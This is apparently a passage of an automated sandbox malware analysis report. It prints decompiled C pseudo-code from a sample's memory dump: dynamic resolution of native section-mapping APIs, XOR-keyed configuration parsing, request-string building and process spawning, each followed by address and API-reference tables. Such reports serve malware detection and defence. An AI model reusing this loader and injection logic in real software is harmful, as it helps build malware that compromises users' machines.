				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0x47bd33c; // 0x6cb9bb0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E047B9810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x47bc19c;
				}
				_t44 = E047B47E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E047B58BE(lstrlenW(0x47beb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x47beb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x47bd2a4; // 0x24fa5a8
						_t73 =  *0x47bd11c; // 0x47babc9
						_t18 = _t75 + 0x47beb38; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E047B58BE(lstrlenW(0x47bec58) + _a8 + _t57 + _t58 + lstrlenW(0x47bec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E047B147E(_v16);
						} else {
							_t64 =  *0x47bd2a4; // 0x24fa5a8
							_t31 = _t64 + 0x47bec58; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E047B147E(_v8);
				}
				return _v20;
			}


























                                          0x047b30fc
                                          0x047b3104
                                          0x047b310a
                                          0x047b311a
                                          0x047b311d
                                          0x047b3122
                                          0x047b3127
                                          0x047b3129
                                          0x047b3129
                                          0x047b3132
                                          0x047b3137
                                          0x047b313c
                                          0x047b3142
                                          0x047b314c
                                          0x047b3155
                                          0x047b315c
                                          0x047b316a
                                          0x047b317c
                                          0x047b3181
                                          0x047b3186
                                          0x047b318f
                                          0x047b3198
                                          0x047b31a1
                                          0x047b31af
                                          0x047b31b7
                                          0x047b31bc
                                          0x047b31bf
                                          0x047b31ca
                                          0x047b31e1
                                          0x047b31e5
                                          0x047b3218
                                          0x047b31e7
                                          0x047b31ea
                                          0x047b31f2
                                          0x047b31fd
                                          0x047b3205
                                          0x047b320d
                                          0x047b3211
                                          0x047b3211
                                          0x047b31e5
                                          0x047b3220
                                          0x047b3225
                                          0x047b322c

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 047B3111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 047B314C
                                          • lstrlen.KERNEL32(?), ref: 047B3155
                                          • lstrlen.KERNEL32(00000000), ref: 047B315C
                                          • lstrlenW.KERNEL32(80000002), ref: 047B316A
                                          • lstrlenW.KERNEL32(047BEB38), ref: 047B3173
                                          • lstrlen.KERNEL32(?), ref: 047B31B7
                                          • lstrlen.KERNEL32(?), ref: 047B31BF
                                          • lstrlenW.KERNEL32(?), ref: 047B31CA
                                          • lstrlenW.KERNEL32(047BEC58), ref: 047B31D3
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: fb0e7699258aa842df5a8cc0604af123925565d71775259bd6f812d82c079fa7
                                          • Instruction ID: d31c52a70f32dfc97b7cf745df95fc95b4df083b8440fe6824785ca0ff161ee2
                                          • Opcode Fuzzy Hash: fb0e7699258aa842df5a8cc0604af123925565d71775259bd6f812d82c079fa7
                                          • Instruction Fuzzy Hash: 8831677290020AAFDF12AFA4CD48EDE7BB9EF48358B018065E944A7311DB35EA15DFD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B1493, Relevance: 12.1, APIs: 8, Instructions: 110librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E047B1493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E047B57D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x47bd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x47bd2a4; // 0x24fa5a8
					_t18 = _t46 + 0x47be3e6; // 0x73797325
					_t66 = E047B77E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x47bd2a4; // 0x24fa5a8
						_t19 = _t49 + 0x47be747; // 0x6cb8cef
						_t20 = _t49 + 0x47be0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E047B684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E047B684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x47bd238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E047B147E(_t68);
				goto L12;
			}



















                                          0x047b149b
                                          0x047b149b
                                          0x047b14aa
                                          0x047b14b1
                                          0x047b14b6
                                          0x047b15c6
                                          0x047b15cd
                                          0x047b15cd
                                          0x047b14c5
                                          0x047b14d0
                                          0x047b14d3
                                          0x047b14d8
                                          0x047b14ed
                                          0x047b14f3
                                          0x047b14f4
                                          0x047b14f7
                                          0x047b14fd
                                          0x047b1500
                                          0x047b1505
                                          0x047b150d
                                          0x047b1519
                                          0x047b151d
                                          0x047b15ad
                                          0x047b1523
                                          0x047b1523
                                          0x047b1528
                                          0x047b152f
                                          0x047b1543
                                          0x047b1547
                                          0x047b1596
                                          0x047b1549
                                          0x047b154a
                                          0x047b1551
                                          0x047b156a
                                          0x047b156c
                                          0x047b1570
                                          0x047b1577
                                          0x047b1591
                                          0x047b1579
                                          0x047b1582
                                          0x047b1587
                                          0x047b1587
                                          0x047b1577
                                          0x047b15a5
                                          0x047b15a5
                                          0x047b151d
                                          0x047b15b4
                                          0x047b15bd
                                          0x047b15c1
                                          0x00000000

                                          APIs
                                            • Part of subcall function 047B57D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047B14AF,?,?,?,?,00000000,00000000), ref: 047B57FD
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047B581F
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 047B5835
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047B584B
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047B5861
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047B5877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 047B14C5
                                          • memset.NTDLL ref: 047B1500
                                            • Part of subcall function 047B77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,047B333A,73797325), ref: 047B77F7
                                            • Part of subcall function 047B77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047B7811
                                          • GetModuleHandleA.KERNEL32(4E52454B,06CB8CEF,73797325), ref: 047B1536
                                          • GetProcAddress.KERNEL32(00000000), ref: 047B153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B15A5
                                            • Part of subcall function 047B684E: GetProcAddress.KERNEL32(36776F57,047B935F), ref: 047B6869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 047B1582
                                          • CloseHandle.KERNEL32(?), ref: 047B1587
                                          • GetLastError.KERNEL32(00000001), ref: 047B158B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: 917840e449b2bd5dc1ae7e17b9b74dd352f95345025e096d9992abfcc99fd220
                                          • Instruction ID: ade785f32626344a450896c8704aba5049f2ba66114560bbf87eb1a7b1ae26a7
                                          • Opcode Fuzzy Hash: 917840e449b2bd5dc1ae7e17b9b74dd352f95345025e096d9992abfcc99fd220
                                          • Instruction Fuzzy Hash: E53134B1900209AFDB21AFE4DD88EDEBBBCEF04344F508565E646E7210D635AE44DBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B4D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E047B4D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x47bd2a4; // 0x24fa5a8
				_t1 = _t9 + 0x47be62c; // 0x253d7325
				_t36 = 0;
				_t28 = E047B6027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E047B58BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E047B6F33(_t34, _t41, _a8);
						E047B147E(_t41);
						_t42 = E047B4759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E047B147E(_t36);
							_t36 = _t42;
						}
						_t43 = E047B4858(_t36, _t33);
						if(_t43 != 0) {
							E047B147E(_t36);
							_t36 = _t43;
						}
					}
					E047B147E(_t28);
				}
				return _t36;
			}














                                          0x047b4d2c
                                          0x047b4d2f
                                          0x047b4d30
                                          0x047b4d38
                                          0x047b4d3f
                                          0x047b4d46
                                          0x047b4d4a
                                          0x047b4d50
                                          0x047b4d57
                                          0x047b4d5c
                                          0x047b4d6e
                                          0x047b4d72
                                          0x047b4d76
                                          0x047b4d7c
                                          0x047b4d81
                                          0x047b4d91
                                          0x047b4d93
                                          0x047b4daa
                                          0x047b4dae
                                          0x047b4db1
                                          0x047b4db6
                                          0x047b4db6
                                          0x047b4dbf
                                          0x047b4dc3
                                          0x047b4dc6
                                          0x047b4dcb
                                          0x047b4dcb
                                          0x047b4dc3
                                          0x047b4dce
                                          0x047b4dce
                                          0x047b4dd9

                                          APIs
                                            • Part of subcall function 047B6027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,047B4D46,253D7325,00000000,00000000,74ECC740,?,?,047B52FE,?), ref: 047B608E
                                            • Part of subcall function 047B6027: sprintf.NTDLL ref: 047B60AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,047B52FE,?,06CB95B0), ref: 047B4D57
                                          • lstrlen.KERNEL32(?,?,?,047B52FE,?,06CB95B0), ref: 047B4D5F
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • strcpy.NTDLL ref: 047B4D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 047B4D81
                                            • Part of subcall function 047B6F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,047B4D90,00000000,?,?,?,047B52FE,?,06CB95B0), ref: 047B6F4A
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047B52FE,?,06CB95B0), ref: 047B4D9E
                                            • Part of subcall function 047B4759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,047B4DAA,00000000,?,?,047B52FE,?,06CB95B0), ref: 047B4763
                                            • Part of subcall function 047B4759: _snprintf.NTDLL ref: 047B47C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: bf46629ff7efb67d99f7212a11cf81c8084e588185a9142e8867434cdb27179f
                                          • Instruction ID: bdfe1c1f94146ed71e133e7e7d8c3cbfbf05ea1ad08f25f3bd5475935502a64b
                                          • Opcode Fuzzy Hash: bf46629ff7efb67d99f7212a11cf81c8084e588185a9142e8867434cdb27179f
                                          • Instruction Fuzzy Hash: 64117373A015257B56227BF49D48EEF2BADDE896A83054125F684AB301DA38ED0187E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B98F7, Relevance: 9.2, APIs: 6, Instructions: 187memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E047B98F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x47bd2a0; // 0x59935a40
				if(E047B96D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x47bd2d0 = _v12;
				}
				_t23 =  *0x47bd2a0; // 0x59935a40
				if(E047B96D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x47bd2a0; // 0x59935a40
						_t29 = E047B10CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x47bd240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x47bd2a0; // 0x59935a40
						_t30 = E047B10CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x47bd244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x47bd2a0; // 0x59935a40
						_t31 = E047B10CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x47bd248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x47bd2a0; // 0x59935a40
						_t32 = E047B10CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x47bd004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x47bd2a0; // 0x59935a40
						_t33 = E047B10CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x47bd02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x47bd2a0; // 0x59935a40
						_t34 = E047B10CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E047BA2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E047B9B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x47bd2a0; // 0x59935a40
						_t35 = E047B10CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E047BA2EF(0, _t35) != 0) {
						_t86 =  *0x47bd324; // 0x6cb95b0
						E047B4C3A(_t86 + 4, _t39);
					}
					HeapFree( *0x47bd238, 0, _t70);
					return 0;
				}
			}





























                                          0x047b98f7
                                          0x047b98f7
                                          0x047b98f7
                                          0x047b98f7
                                          0x047b98fa
                                          0x047b98fb
                                          0x047b98fc
                                          0x047b9916
                                          0x047b9924
                                          0x047b9924
                                          0x047b9929
                                          0x047b9943
                                          0x047b9ad2
                                          0x047b9ad4
                                          0x047b9949
                                          0x047b9949
                                          0x047b994a
                                          0x047b994d
                                          0x047b994e
                                          0x047b9953
                                          0x047b9969
                                          0x047b9955
                                          0x047b9955
                                          0x047b9962
                                          0x047b9962
                                          0x047b9973
                                          0x047b9975
                                          0x047b997f
                                          0x047b9984
                                          0x047b9984
                                          0x047b997f
                                          0x047b998b
                                          0x047b99a1
                                          0x047b998d
                                          0x047b998d
                                          0x047b999a
                                          0x047b999a
                                          0x047b99a5
                                          0x047b99a7
                                          0x047b99b1
                                          0x047b99b6
                                          0x047b99b6
                                          0x047b99b1
                                          0x047b99bd
                                          0x047b99d3
                                          0x047b99bf
                                          0x047b99bf
                                          0x047b99cc
                                          0x047b99cc
                                          0x047b99d7
                                          0x047b99d9
                                          0x047b99e3
                                          0x047b99e8
                                          0x047b99e8
                                          0x047b99e3
                                          0x047b99ef
                                          0x047b9a05
                                          0x047b99f1
                                          0x047b99f1
                                          0x047b99fe
                                          0x047b99fe
                                          0x047b9a09
                                          0x047b9a0b
                                          0x047b9a15
                                          0x047b9a1a
                                          0x047b9a1a
                                          0x047b9a15
                                          0x047b9a21
                                          0x047b9a37
                                          0x047b9a23
                                          0x047b9a23
                                          0x047b9a30
                                          0x047b9a30
                                          0x047b9a3b
                                          0x047b9a3d
                                          0x047b9a47
                                          0x047b9a4c
                                          0x047b9a4c
                                          0x047b9a47
                                          0x047b9a53
                                          0x047b9a69
                                          0x047b9a55
                                          0x047b9a55
                                          0x047b9a62
                                          0x047b9a62
                                          0x047b9a6d
                                          0x047b9a6f
                                          0x047b9a72
                                          0x047b9a73
                                          0x047b9a7a
                                          0x047b9a7c
                                          0x047b9a7d
                                          0x047b9a7d
                                          0x047b9a7a
                                          0x047b9a84
                                          0x047b9a9a
                                          0x047b9a86
                                          0x047b9a86
                                          0x047b9a93
                                          0x047b9a93
                                          0x047b9a9e
                                          0x047b9aac
                                          0x047b9ab6
                                          0x047b9ab6
                                          0x047b9ac3
                                          0x047b9acf
                                          0x047b9acf

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B99AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B99DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B9A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B9A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B9AC3
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 75c9b69530f69661c0bb22afcc7f246b8de6ca03f1f425ac0f000b3af6bcc49f
                                          • Instruction ID: 48dbc15172893ab7d01c0b1a18910c838cd767fbcff74e8131cee7250e9a41de
                                          • Opcode Fuzzy Hash: 75c9b69530f69661c0bb22afcc7f246b8de6ca03f1f425ac0f000b3af6bcc49f
                                          • Instruction Fuzzy Hash: F05180E0700544EEE720EAB59E88FDB73ADEB88744B644925E791D3304EA34FD00D6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 047B13B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 047B13C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 047B13DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B1443
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B1452
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B145D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 0dabdf290491c1f243c597d298b2d42eab99f89deb45b4bbd19bbedbf705be63
                                          • Instruction ID: 7fa7da8bba7d1b0b42fa530596429486590f2d5870269feb1e84e3b749f78526
                                          • Opcode Fuzzy Hash: 0dabdf290491c1f243c597d298b2d42eab99f89deb45b4bbd19bbedbf705be63
                                          • Instruction Fuzzy Hash: 9B416D36900A09AFDB01EFF8D854ADEB7B9EF49300F108425E914EB210DA71AD06CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B57D8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E047B57D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E047B58BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x47bd2a4; // 0x24fa5a8
					_t1 = _t23 + 0x47be11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x47bd2a4; // 0x24fa5a8
					_t2 = _t26 + 0x47be769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E047B147E(_t54);
					} else {
						_t30 =  *0x47bd2a4; // 0x24fa5a8
						_t5 = _t30 + 0x47be756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x47bd2a4; // 0x24fa5a8
							_t7 = _t33 + 0x47be40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x47bd2a4; // 0x24fa5a8
								_t9 = _t36 + 0x47be4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x47bd2a4; // 0x24fa5a8
									_t11 = _t39 + 0x47be779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E047B7B01(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x047b57e7
                                          0x047b57eb
                                          0x047b58ad
                                          0x047b57f1
                                          0x047b57f1
                                          0x047b57f6
                                          0x047b5809
                                          0x047b580b
                                          0x047b5810
                                          0x047b5818
                                          0x047b581f
                                          0x047b5821
                                          0x047b5826
                                          0x047b58a5
                                          0x047b58a6
                                          0x047b5828
                                          0x047b5828
                                          0x047b582d
                                          0x047b5835
                                          0x047b5837
                                          0x047b583c
                                          0x00000000
                                          0x047b583e
                                          0x047b583e
                                          0x047b5843
                                          0x047b584b
                                          0x047b584d
                                          0x047b5852
                                          0x00000000
                                          0x047b5854
                                          0x047b5854
                                          0x047b5859
                                          0x047b5861
                                          0x047b5863
                                          0x047b5868
                                          0x00000000
                                          0x047b586a
                                          0x047b586a
                                          0x047b586f
                                          0x047b5877
                                          0x047b5879
                                          0x047b587e
                                          0x00000000
                                          0x047b5880
                                          0x047b5886
                                          0x047b588b
                                          0x047b5892
                                          0x047b5897
                                          0x047b589c
                                          0x00000000
                                          0x047b589e
                                          0x047b58a1
                                          0x047b58a1
                                          0x047b589c
                                          0x047b587e
                                          0x047b5868
                                          0x047b5852
                                          0x047b583c
                                          0x047b5826
                                          0x047b58bb

                                          APIs
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047B14AF,?,?,?,?,00000000,00000000), ref: 047B57FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 047B581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 047B5835
